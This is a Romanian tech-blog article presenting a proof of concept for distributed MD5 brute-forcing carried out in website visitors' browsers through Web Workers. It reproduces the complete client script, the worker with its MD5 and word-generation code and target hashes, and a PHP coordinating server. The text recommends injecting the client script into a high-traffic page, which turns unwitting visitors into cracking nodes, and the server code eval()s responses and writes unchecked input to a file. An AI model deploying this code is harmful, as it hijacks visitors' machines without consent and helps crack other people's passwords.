• Acasă
  • Despre noi
  • Autori
  • Mărturii
  • Arhivă
  • Trimite Articol
  • Contact

WORLDIT

Lumea în 1 și 0.

  • Știri
    • Tehnologie
    • Tehnologie mobilă
    • Securitate
    • Developers
    • Știință
    • Benzi desenate
    • Jocuri
    • Intern
  • Tehnic
    • Browser
    • C#
    • C/C++
    • Challenge
    • HTML/CSS
    • Javascript, Ajax, jQuery
    • Open Source
    • PHP
    • Python
    • Securitate IT
    • Socializare
    • WordPress
    • Altele
  • Recenzii
  • Interviuri
  • Evenimente

Atac distribuit Brute Force folosind Browserul – POC

5
  • Publicat de Andrei Avădănei
  • în Javascript, Ajax, jQuery
  • — 29 oct., 2010 at 10:00 am

Aparitia browserelor moderne a adus foarte multe avantaje ce au dus la dezvoltarea web-ului intr-un mod pozitiv. Totusi, acest lucru a adus cu el si foarte multe probleme de securitate, dar si noi metoda de punere in valoare a unor atacuri vechi. Probabil toti ati auzit de posibilitatea de a face operatii sincronizate in timp real, fara a efecta linia de executie in browserele actuale (si cele ceva mai vechi). “Web-workers” – un nou API ce permite rularea a unui script js pe o alta linie de executie (thred) creata de browser pentru pagina web, acest lucru permite efectuarea de operatii complexe fara a mai bloca interactiunea utilizatorului cu pagina web.

Aceasta tehnologie a permis aparitia unui nou tip de brute force, “brute force browser distributed attack” care utilizeaza o pagina web pentru a executa spargerea unui anumit sistem de securitate in cazul acesta va fi un exemplu de spargere a unui hash MD5.

Txdev a creat un POC legat de aceasta tehnologie cat si de modul cum se poate instantia un atac brute force prin browser. Conceptul are la baza structura unei aplicatii standalone – server & client.

Partea de client va contine un fisier Javascript ce va fi incarcat in browser, acesta face cererea catre server utilizand Ajax, primeste un raspuns de la server, web workerul va incarca al doilea script Javascript (work.js) si va trimite catre server cateva informatii ce il vor ajuta sa deduca punctul la care s-a ajuns. Scriptul work.js cuprinde cateva functii necesare pentru a crea atacul brute force printre care functia de generare a hashului md5, precum si cea de generare a tuturor cuvintelor de diverse dimensiuni. Script-ul work.js va genera si testa numarul de cuvinte primit ca parametru de la pozitia primita, dupa care va returna catre script-ul js cuvintele gasite si pozitia de start.

Partea de server va cuprinde serverul ce va trimite pentru fiecare client o noua pozitie de start si va astepta raspunsul de la acesta. Serverul poate fi un script PHP sau chiar un server dedicat, al doilea avand de multe ori un timp de raspuns mai bun decat al serverului PHP. Serverul trebuie sa aiba activata extensia APC ce este utilizata ca o alternativa NoSQL pentru a memora in cache pozitiile trimise de catre clienti si alte variabile utilizate.

Articolul scris de txdev explica foarte bine codul ce l-a facut, asa ca nu ma astept la probleme de intelegere a conceptului.
Acesta este script-ul care va face cererile catre server, creeaza o noua linie de executie pentru script-ul work.js si returneaza rezultatul primit de la work.js catre server. De preferinta injectat intr-o pagina web cu trafic.

<script>
/*
  code by : tdxev
  version : 2010.10.11
  website : http://www.tdxev.com
  team    : http://www.insecurity.ro
  documentation :
  -javascriptWorkers: http://ejohn.org/blog/web-workers/  
*/
 
//adresa pagini script-ului PHP 
//address of the PHP script
var theServer = '';
//adresa pagini script-ului js  worker
//address of the js worker script
var theWorker = 'work.js';
 
//Ajax object
function GetXmlHttpObject(){
var xmlHttp=null;
try {xmlHttp=new XMLHttpRequest();} // Firefox, Opera 8.0+, Safari
catch (e){ // Internet Explorer
    try {xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");}
    catch (e){ xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");}}
return xmlHttp;
}
 
//creeaza o cerere catre server pentru a primi o noua valoare de start
//make a request to the server to get another start value
function makeRequest(url){
  var objAjax = new  GetXmlHttpObject;
  if (objAjax) {
    objAjax.onreadystatechange = function (){
        if (objAjax .readyState == 4){
          if (objAjax.status== 200){
            // creeaza un obiect din valorile date
            // make a object from given values
            eval('var json='+objAjax.responseText); 
            // apeleaza functia care creeaza obiectul worker
            // call the function that create the object worker
            laMunca(json);
            } else { alert("AjaxError : " + objAjax.status) }
          }
      } 
    objAjax.open("GET",url,true);
    objAjax.send(null);
    } else {alert('No Ajax')}
}
 
//creeaza obiectul worker si seteaza functia de callback
//make the object worker and set the callback function
function laMunca(msg){
  worker = new Worker(theWorker);
  //functia ce va fi executata la primirea rezultatului de la worker
  //function that will be executed when the result from the worker will be received
  worker.onmessage = function(param){
    // creeaza o noua cerere pentru o noua pozitie de start & trimite cuvintele gasite
    // make a new request for start position & send words found
    makeRequest(theServer+'?cmd=getNr&oldNr='+param.data.startFrom+'&text='+param.data.wordFound);
  };
  // trimite obiectul primit ca parametru mai departe catre woker
  // send received object as parameter to the worker
  worker.postMessage(msg);
}
makeRequest(theServer+'?cmd=getNr');

Fisierul work.js

/*
  code by : tdxev
  version : 2010.10.11
  website : http://www.tdxev.com
  team    : http://www.insecurity.ro
 
  documentation : 
  -javascript md5 : http://www.webtoolkit.info/javascript-md5.html
  -wordGeneratorBackDoor : http://www.tdxev.com/php-word-generator-without-generate-the-entire-list/
*/
 
 
var MD5 = function (string) {
 
  function RotateLeft(lValue, iShiftBits) {
    return (lValue<<iShiftBits) | (lValue>>>(32-iShiftBits));
  }
 
  function AddUnsigned(lX,lY) {
    var lX4,lY4,lX8,lY8,lResult;
    lX8 = (lX & 0x80000000);
    lY8 = (lY & 0x80000000);
    lX4 = (lX & 0x40000000);
    lY4 = (lY & 0x40000000);
    lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF);
    if (lX4 & lY4) {
      return (lResult ^ 0x80000000 ^ lX8 ^ lY8);
    }
    if (lX4 | lY4) {
      if (lResult & 0x40000000) {
        return (lResult ^ 0xC0000000 ^ lX8 ^ lY8);
      } else {
        return (lResult ^ 0x40000000 ^ lX8 ^ lY8);
      }
    } else {
      return (lResult ^ lX8 ^ lY8);
    }
   }
 
   function F(x,y,z) { return (x & y) | ((~x) & z); }
   function G(x,y,z) { return (x & z) | (y & (~z)); }
   function H(x,y,z) { return (x ^ y ^ z); }
  function I(x,y,z) { return (y ^ (x | (~z))); }
 
  function FF(a,b,c,d,x,s,ac) {
    a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac));
    return AddUnsigned(RotateLeft(a, s), b);
  };
 
  function GG(a,b,c,d,x,s,ac) {
    a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac));
    return AddUnsigned(RotateLeft(a, s), b);
  };
 
  function HH(a,b,c,d,x,s,ac) {
    a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac));
    return AddUnsigned(RotateLeft(a, s), b);
  };
 
  function II(a,b,c,d,x,s,ac) {
    a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac));
    return AddUnsigned(RotateLeft(a, s), b);
  };
 
  function ConvertToWordArray(string) {
    var lWordCount;
    var lMessageLength = string.length;
    var lNumberOfWords_temp1=lMessageLength + 8;
    var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64;
    var lNumberOfWords = (lNumberOfWords_temp2+1)*16;
    var lWordArray=Array(lNumberOfWords-1);
    var lBytePosition = 0;
    var lByteCount = 0;
    while ( lByteCount < lMessageLength ) {
      lWordCount = (lByteCount-(lByteCount % 4))/4;
      lBytePosition = (lByteCount % 4)*8;
      lWordArray[lWordCount] = (lWordArray[lWordCount] | (string.charCodeAt(lByteCount)<<lBytePosition));
      lByteCount++;
    }
    lWordCount = (lByteCount-(lByteCount % 4))/4;
    lBytePosition = (lByteCount % 4)*8;
    lWordArray[lWordCount] = lWordArray[lWordCount] | (0x80<<lBytePosition);
    lWordArray[lNumberOfWords-2] = lMessageLength<<3;
    lWordArray[lNumberOfWords-1] = lMessageLength>>>29;
    return lWordArray;
  };
 
  function WordToHex(lValue) {
    var WordToHexValue="",WordToHexValue_temp="",lByte,lCount;
    for (lCount = 0;lCount<=3;lCount++) {
      lByte = (lValue>>>(lCount*8)) & 255;
      WordToHexValue_temp = "0" + lByte.toString(16);
      WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2);
    }
    return WordToHexValue;
  };
 
  function Utf8Encode(string) {
    string = string.replace(/\r\n/g,"\n");
    var utftext = "";
 
    for (var n = 0; n < string.length; n++) {
 
      var c = string.charCodeAt(n);
 
      if (c < 128) {
        utftext += String.fromCharCode(c);
      }
      else if((c > 127) && (c < 2048)) {
        utftext += String.fromCharCode((c >> 6) | 192);
        utftext += String.fromCharCode((c & 63) | 128);
      }
      else {
        utftext += String.fromCharCode((c >> 12) | 224);
        utftext += String.fromCharCode(((c >> 6) & 63) | 128);
        utftext += String.fromCharCode((c & 63) | 128);
      }
 
    }
 
    return utftext;
  };
 
  var x=Array();
  var k,AA,BB,CC,DD,a,b,c,d;
  var S11=7, S12=12, S13=17, S14=22;
  var S21=5, S22=9 , S23=14, S24=20;
  var S31=4, S32=11, S33=16, S34=23;
  var S41=6, S42=10, S43=15, S44=21;
 
  string = Utf8Encode(string);
 
  x = ConvertToWordArray(string);
 
  a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476;
 
  for (k=0;k<x.length;k+=16) {
    AA=a; BB=b; CC=c; DD=d;
    a=FF(a,b,c,d,x[k+0], S11,0xD76AA478);
    d=FF(d,a,b,c,x[k+1], S12,0xE8C7B756);
    c=FF(c,d,a,b,x[k+2], S13,0x242070DB);
    b=FF(b,c,d,a,x[k+3], S14,0xC1BDCEEE);
    a=FF(a,b,c,d,x[k+4], S11,0xF57C0FAF);
    d=FF(d,a,b,c,x[k+5], S12,0x4787C62A);
    c=FF(c,d,a,b,x[k+6], S13,0xA8304613);
    b=FF(b,c,d,a,x[k+7], S14,0xFD469501);
    a=FF(a,b,c,d,x[k+8], S11,0x698098D8);
    d=FF(d,a,b,c,x[k+9], S12,0x8B44F7AF);
    c=FF(c,d,a,b,x[k+10],S13,0xFFFF5BB1);
    b=FF(b,c,d,a,x[k+11],S14,0x895CD7BE);
    a=FF(a,b,c,d,x[k+12],S11,0x6B901122);
    d=FF(d,a,b,c,x[k+13],S12,0xFD987193);
    c=FF(c,d,a,b,x[k+14],S13,0xA679438E);
    b=FF(b,c,d,a,x[k+15],S14,0x49B40821);
    a=GG(a,b,c,d,x[k+1], S21,0xF61E2562);
    d=GG(d,a,b,c,x[k+6], S22,0xC040B340);
    c=GG(c,d,a,b,x[k+11],S23,0x265E5A51);
    b=GG(b,c,d,a,x[k+0], S24,0xE9B6C7AA);
    a=GG(a,b,c,d,x[k+5], S21,0xD62F105D);
    d=GG(d,a,b,c,x[k+10],S22,0x2441453);
    c=GG(c,d,a,b,x[k+15],S23,0xD8A1E681);
    b=GG(b,c,d,a,x[k+4], S24,0xE7D3FBC8);
    a=GG(a,b,c,d,x[k+9], S21,0x21E1CDE6);
    d=GG(d,a,b,c,x[k+14],S22,0xC33707D6);
    c=GG(c,d,a,b,x[k+3], S23,0xF4D50D87);
    b=GG(b,c,d,a,x[k+8], S24,0x455A14ED);
    a=GG(a,b,c,d,x[k+13],S21,0xA9E3E905);
    d=GG(d,a,b,c,x[k+2], S22,0xFCEFA3F8);
    c=GG(c,d,a,b,x[k+7], S23,0x676F02D9);
    b=GG(b,c,d,a,x[k+12],S24,0x8D2A4C8A);
    a=HH(a,b,c,d,x[k+5], S31,0xFFFA3942);
    d=HH(d,a,b,c,x[k+8], S32,0x8771F681);
    c=HH(c,d,a,b,x[k+11],S33,0x6D9D6122);
    b=HH(b,c,d,a,x[k+14],S34,0xFDE5380C);
    a=HH(a,b,c,d,x[k+1], S31,0xA4BEEA44);
    d=HH(d,a,b,c,x[k+4], S32,0x4BDECFA9);
    c=HH(c,d,a,b,x[k+7], S33,0xF6BB4B60);
    b=HH(b,c,d,a,x[k+10],S34,0xBEBFBC70);
    a=HH(a,b,c,d,x[k+13],S31,0x289B7EC6);
    d=HH(d,a,b,c,x[k+0], S32,0xEAA127FA);
    c=HH(c,d,a,b,x[k+3], S33,0xD4EF3085);
    b=HH(b,c,d,a,x[k+6], S34,0x4881D05);
    a=HH(a,b,c,d,x[k+9], S31,0xD9D4D039);
    d=HH(d,a,b,c,x[k+12],S32,0xE6DB99E5);
    c=HH(c,d,a,b,x[k+15],S33,0x1FA27CF8);
    b=HH(b,c,d,a,x[k+2], S34,0xC4AC5665);
    a=II(a,b,c,d,x[k+0], S41,0xF4292244);
    d=II(d,a,b,c,x[k+7], S42,0x432AFF97);
    c=II(c,d,a,b,x[k+14],S43,0xAB9423A7);
    b=II(b,c,d,a,x[k+5], S44,0xFC93A039);
    a=II(a,b,c,d,x[k+12],S41,0x655B59C3);
    d=II(d,a,b,c,x[k+3], S42,0x8F0CCC92);
    c=II(c,d,a,b,x[k+10],S43,0xFFEFF47D);
    b=II(b,c,d,a,x[k+1], S44,0x85845DD1);
    a=II(a,b,c,d,x[k+8], S41,0x6FA87E4F);
    d=II(d,a,b,c,x[k+15],S42,0xFE2CE6E0);
    c=II(c,d,a,b,x[k+6], S43,0xA3014314);
    b=II(b,c,d,a,x[k+13],S44,0x4E0811A1);
    a=II(a,b,c,d,x[k+4], S41,0xF7537E82);
    d=II(d,a,b,c,x[k+11],S42,0xBD3AF235);
    c=II(c,d,a,b,x[k+2], S43,0x2AD7D2BB);
    b=II(b,c,d,a,x[k+9], S44,0xEB86D391);
    a=AddUnsigned(a,AA);
    b=AddUnsigned(b,BB);
    c=AddUnsigned(c,CC);
    d=AddUnsigned(d,DD);
  }
 
  var temp = WordToHex(a)+WordToHex(b)+WordToHex(c)+WordToHex(d);
 
  return temp.toLowerCase();
}
 
//functia ce genereaza cuvintele
//function that generate the words
function wordGeneratorBackDoor(charset,nr){  
  w=charset.length;
  if (nr<=w){return charset.substr(nr-1,1);}
  CLb=1;
  CLsum=0;
  CLsumi=0;
  CLnr=0;
 
  while (nr>CLsum){
    CLnr++;
    CLsumi += CLb;   
    CLb = Math.pow(w,CLnr);  
    CLsum += CLb; 
    }  
  CLsumi--;
  CLp=nr-CLsumi;
  CLcur=CLb*w;
  thex='';
  for (i=CLnr; i>0; i--){
    CLcur=CLcur/w;
    m=CLcur/w;
    if (m==1){
      rest=nr%w;
      if (rest==0) {thex += charset.substr(w-1,1);} else {thex += charset.substr(rest-1,1);}
    } else {
      for (k=1; k<=w; k++){
        if (((m*k)>=CLp) && (CLp < (m*(k+1)))){
            thex += charset.substr(k-1,1);
            if (k>1) {CLp=CLp-((k-1)*(m));}  
            k=w+1;
          }
      }
    }
  }
  return thex;
}
 
//lista de hash-uri ce trebuie spart
//list of hashes that need to be cracked
var theHash = new Array(
'47bce5c74f589f4867dbd57e9ca9f808',
'7815696ecbf1c96e6894b779456d330e',
'912ec803b2ce49e4a541068d495ab570');
 
//setul de caractere ce va fi utilizat pentru brute force
//character set that will bee used for brute force
var theCharSet='abcdefghijklmnopqrstuvwxyz0123456789_';
 
onmessage = function(param){
  var msg='';
  var word='';
  var startPos = parseInt(param.data.startFrom);
  var tryNr = parseInt(param.data.tryN); 
 
  for (g=startPos; g<startPos+tryNr; g++){
    word = wordGeneratorBackDoor(theCharSet,g);
    theHash.forEach(function(val){if (MD5(word)==val)  { msg += val+'='+word };  });
  };
 
  var  raspuns = {'startFrom':param.data.startFrom,'wordFound':msg}  
    postMessage(raspuns);
};

Fisierul server.php

<?php
/*
  code by : tdxev
  version : 2010.10.11
  website : http://www.tdxev.com
  team    : http://www.insecurity.ro
 
  system requirements :
  -RO:extensia APC trebuie sa fie activa pe server & Browser-ul sa suporte Web Workers
  -EN:the extension APC must be active on the server & Browser suport for Web Workers 
 
  documentation :
  -APC extension  : http://www.php.net/manual/en/book.apc.php
*/
 
# numarul de cuvinte pe care fiecare client urmeaza sa il incerce pentru a sparge hash-ul
# the number of words that each client will try for breaking the hash
$GLOBALS['incrBy']    = 500;   
 
# numele fisierului in care sunt salvate hash-urile sparte
# name of the file that will contain the broken hash 
$GLOBALS['theFile']    = 'hash.txt';  
 
# pozitia de la care incepe spargerea hash-ului
# the position from which the breaking of the hash will start
$GLOBALS['StartFrom']  = 0;     
 
# timpul in care un client trebuie sa raspunda & daca este depasit acest timp lista este trimisa care alt client 
# the time in which a client must respond & if this time is exceeded the list is sent to another client
$GLOBALS['respondTimeLimit'] = 60; # (seconds)

$GLOBALS['appDebug']=true;
 
if($_GET['cmd']=='getNr'){SendNewCommand();}
if($_GET['text']!=''){file_put_contents($GLOBALS['theFile'],file_get_contents($GLOBALS['theFile'])."\r\n".$_GET['text']);}
 
function SendNewCommand(){  
  # salveaza raspunsul de la client || raspunsul este pozitia de start de la care clientul a incercat sa sparga hash-ul
  # save the response from the client || the response is the start position from where the client will try to break the hash
  $oldNr = (float) $_GET['oldNr'];
 
  # lista ce pastreaza pozitiile de start trimise catre fiecare client
  # the list that saves the start position sent to the each client
  $theList     = apc_fetch('theList'); 
 
  # lista ce pastreaza pozitiile de start ce au fost trimise si nu am primit raspuns in intervalul de timp setat
  # the list that keeps the start positions that have been send and we have not been answered in the set time range
  $urgentList = apc_fetch('urgentList'); 
 
  # daca nu este definita variabila currentNr inseamna ca nu inceput procesul de spargere
  # if the variable currentNr is not defined it means that the process of breaking is not started
  if (apc_fetch('currentNr')===false){   
      # initializa valoarea variabilei currentNr cu valoarea de pornire (vezi : $StartFrom)
      # initiates the value of currentNr whit the value of start (see : $StartFrom)
      apc_add('currentNr', $GLOBALS['StartFrom']);   
      apc_add('startTime', time());   
    }
    # daca procesul de spargere a inceput
    # if the breaking process has started
    else {      
      apc_store('unset', '');
      # salveaza data curenta  & va fi utilizata pentru a calcula cat timp a trecut de la o cerere
      # save the current date  & will be used to calculate the time elapsed from a request
      $curDT = time();
      # proceseaza lista $theList pentru a vedea daca este vreun script care (nu) a trimis un raspuns
      # processes the list $theList to see if there is any script that did (not) send a response
      if(($theList!==false) && (count($theList) > 0)) 
      foreach($theList as $i => $value){        
        # sterge din lista pozitiile de start pentru care a fost returnat un rezultat
        # delete from the list the start position for which was send a result
        if ($oldNr==$theList[$i][0]){
          if ($GLOBALS['appDebug']) { // for debug only            
            apc_store('last', $theList[$i][0]);   
            apc_store('time', ((float) $curDT - (float) $theList[$i][1]));
            }
          #sterge din lista valoare de start pentru care s-a primit un raspuns
          #delete from  the list the start value for which was send a result
          unset($theList[$i]); 
          }
          else
          # daca s-a depasit timpul setat pentru raspuns atunci muta pozitia curenta de start in lista 'urgentList'
          # if the time set for response has been exceeded the current start position will be moved to the list 'urgentList'
          if  (((float) $curDT - (float) $theList[$i][1]) > $GLOBALS['respondTimeLimit']) 
            {
            # adauga pozitia de start curenta pe lista de urgente
            # add the current start position on the urgent list
            $urgentList [] = $theList[$i];
            # sterge pozitia de start din lista ce a fost trimisa catre clienti
            # delete the current start position from the list that was send to the clients
            unset($theList[$i]);          
            }
      }
 
      # daca lista 'urgentList' nu este goala       
      # if the list 'urgentList' is not empty
      if (($urgentList!==false) && (count($urgentList) > 0)) {
        # preia ultimul element
        # get the last element
        $last=end($urgentList);
        # creeaza o nou array pentru a fi trimis catre client & adaugat in lista 'theList' (pozitia de start: data curenta)
        # create a now array to be sent to the client & add to the list 'theList' (start position : current position)
        $newLine=array($last[0],$curDT);
        # sterge din lista de urgente  ultimul element
        # delete from the list the last element
        array_pop($urgentList);
        } else { 
          # daca lista 'urgentList' este goala
          # if the list 'urgentList' is empty
  
          # preia valoarea de start la care s-a ajuns 
          # get the current value
          $curNr = apc_fetch('currentNr');
 
          # preia valoarea curenta o incrementeaza cu 'incrBy';
          # get the current start value and increment it with 'incrBy'
          apc_store('currentNr', $curNr+$GLOBALS['incrBy']);
 
          # creeaza o nou array pentru a fi trimis catre client & adauga in lista 'theList' (pozitia de start: data curenta)
          # create a new array to be sent to the client & add to the list 'theList' (start position : current position)
          $newLine   = array($curNr,$curDT);                
          }
 
      # adauga in lista 'theList' de pozitii de start trimise catre clienti pozitia actuala
      # add the actual position to 'theList' that keep the start positions sends to the clients the actual position
      $theList[]   = $newLine;
 
      # salveaza lista cu pozitiile de start trimise
      # save the list with the start position sent
      apc_store('theList', $theList);  
      # salveaza lista cu pozitiile de start pentru care s-a depasit timpul limita
      # save the list with the start positions for which the time limit was exceeded
      apc_store('urgentList', $urgentList); // salveaza lista de urgente
      } // else  if end
 
  # trimite catre client pozitia de start curenta si numarul de cuvinte pe care sa il incerce
  # send to the client the current start position  and the number of words that the client will try
  echo json_encode(array('startFrom'=>$newLine[0],'tryN'=>$GLOBALS['incrBy']));
  exit();      
  }
?>

Autorul proiectului a creat si un server Open Source in Delphi ce il gasiti pe pagina articolului original. Nu ramane decat sa va jucati voi cu acest snippet. 🙂

Etichete: ajaxAPCatac distribuitbrute forcecachejavascriptPHPTehnicweb workers

— Andrei Avădănei a scris 1246 articole

Andrei scrie pe worldit.info din vara lui 2011. Este fondatorul Asociatiei Centrul de Cercetare in Securitate Informatica din Romania - CCSIR si coordoneaza DefCamp, cea mai importanta conferinta de securitate informatica & hacking din Europa Centrala si de Est. Andrei ofera in cadrul Bit Sentinel servicii de securitate informatica, penetration testing, security management, recuperarea de pe urma unui atac cibernetic, training-uri si workshop-uri.

  • Articolul anterior ITSpark – aventura ta in IT
  • Articolul următor Aplicatie Twitter pentru Windows Phone

5 Comentarii

  1. Andrey spune:
    octombrie 29, 2010 la 2:51 pm

    Hmmm presupunem ca ai 1000 vizitatori unici pe zii , fiecare dintre ei iti calculeaza in medie 100 Miliaone Hash’uri asta ar venii 100 bilione de hashuri pe zi sau 10^11 care e inca un numar infinit de mic fatza de 2^128 calculat de unii ca fiind 3.40282367 × 10^38.

    Insa cred ca acest sistem ar duce la spargerea unei parole de 10-15 caractere in cateva zile 😕 Oricum ingenios.

  2. Alex Baies spune:
    octombrie 29, 2010 la 3:55 pm

    Super articolul ! Imi permiti sa il distribui pe retelele de socializare ?

  3. Teofil Cojocariu spune:
    octombrie 30, 2010 la 11:25 am

    E foarte bine realizat.
    Felicitari lui tdxev.

  4. Andrei Avadanei spune:
    octombrie 31, 2010 la 12:29 am

    @Alex Cred ca articolul avea menirea de a sublinia o problema grava actuala si punerea rotitelor din creier la munca pentru a realiza un mecanism care sa rezolve aceasta problema, desi, in mod aproape sigur e cam greu. 🙂

  5. rochii elegante spune:
    iulie 27, 2013 la 10:08 am

    Wow that was odd. I just wrote an very long comment but after I
    clicked submit my comment didn’t show up. Grrrr… well I’m
    not writing all that over again. Anyways, just wanted to say wonderful blog!

    Feel free to visit my blog – rochii elegante


  • Facebook

    WorldIT.info
  • Ultimele Atacuri Cibernetice din Romania – RO Hacked

    [wp_rss_retriever url="https://rohacked.bit-sentinel.com/feed/" excerpt="none" items="5" read_more="false" new_window="true" thumbnail="false" cache="0"] RO Hacked este registrul atacurilor cibernetice din România.
  • Caută

  • Articole Recomandate

    • Recent Posts
    • Tags
    • Număr record de participanți la DefCamp 2015, cel mai important eveniment dedicat securității cibernetice din Europe Centrala si de Estdecembrie 2, 2015
    • La DefCamp 2015 vei afla prin ce tehnici pot fi evitate măsurile de securitate ale sistemelor informatice criticeoctombrie 16, 2015
    • Ultima sansa sa rezervi bilete de tip Early Bird la DefCamp 2015septembrie 1, 2015
    • 15 sfaturi despre cum poti deveni un programator bun venite de la specialisti romaniaugust 4, 2015
    • algoritmica Android antivirus Apple Avadanei Andrei benzi desenate BitDefender blog browser C++ Chrome concurs eveniment Facebook Firefox Google google chrome hacking html5 infografic informatica internet Internet Explorer IT javascript linux Microsoft Mozilla Firefox online PHP programare retea sociala review Romania securitate Tehnologie Twitter web Windows Windows 7 Wordpress WorldIT worldit.info Yahoo! YouTube
  • mai 2022
    L Ma Mi J V S D
     1
    2345678
    9101112131415
    16171819202122
    23242526272829
    3031  
    « dec.    
  • Link-uri Sponsorizate

    • laptop second hand

    • Calculatoare Second Hand

    • cod voucher pc garage

  • Home
  • Tehnic
  • Javascript, Ajax, jQuery
  • Atac distribuit Brute Force folosind Browserul – POC
  • Important

    • Bit Sentinel
    • Centrul de Cercetare în Securitate Informatică din România
    • DefCamp
  • Prieteni

    • BetiT.ro
    • bijuterii handmade
    • Computerica | Resurse gratuite PC
    • Descopera.org
    • Gadgeturi si IT – Giz.ro
  • Prieteni

    • PC – Config
    • RO Hacked
    • Stiri IT

Copyright © 2009-2014 WORLDIT. Toate drepturile Rezervate.
Termeni și condiții | Contact | Licența Creative Commons